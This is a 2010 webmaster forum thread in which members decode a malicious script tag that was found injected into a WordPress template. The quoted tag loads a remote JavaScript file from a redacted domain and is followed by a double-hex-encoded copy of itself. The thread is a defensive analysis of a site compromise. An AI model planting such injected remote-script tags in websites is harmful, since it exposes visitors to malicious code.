Welcome to WebmasterWorld Guest from 54.145.39.186

Forum Moderators: phranque

Message Too Old, No Replies

decipher a chunk of malware

     

httpwebwitch

2:26 pm on Jul 6, 2010 (gmt 0)

WebmasterWorld Administrator httpwebwitch is a WebmasterWorld Top Contributor of All Time 10+ Year Member



Here's a challenge for someone who likes puzzles

I just found this little chunk of crap injected into my WordPress template.

<script language="javascript" src="http://get.----[domain removed]----.com/inurl.js"></script>304430413343373336333732363937303734323036433631364536373735363136373635334432323641363137363631373336333732363937303734323232303733373236333344323236383734373437303341324632463637363537343245373336353734363836353646324536333646364432463639364537353732364332453641373332323345334332463733363337323639373037343345


do the numbers mean anything?

SteveWh

4:54 pm on Jul 6, 2010 (gmt 0)

5+ Year Member



An initial guess would be that each 2 digit pair is the hex code for an ASCII char. By that method, the first 8 digits decode to 0D0A, which is a carriage return + line feed.

Another guess is that the string is decoded or transformed by the inurl.js file fetched from the remote site.

mattur

5:12 pm on Jul 6, 2010 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



It's double hex encoded, and appears to decode to the <script> statement you quote above:

<script language="javascript" src="http://get.----[mattur removed]----.com/inurl.js"></script>

Malfunctioning malware?! :)
 

Featured Threads

Hot Threads This Week

Hot Threads This Month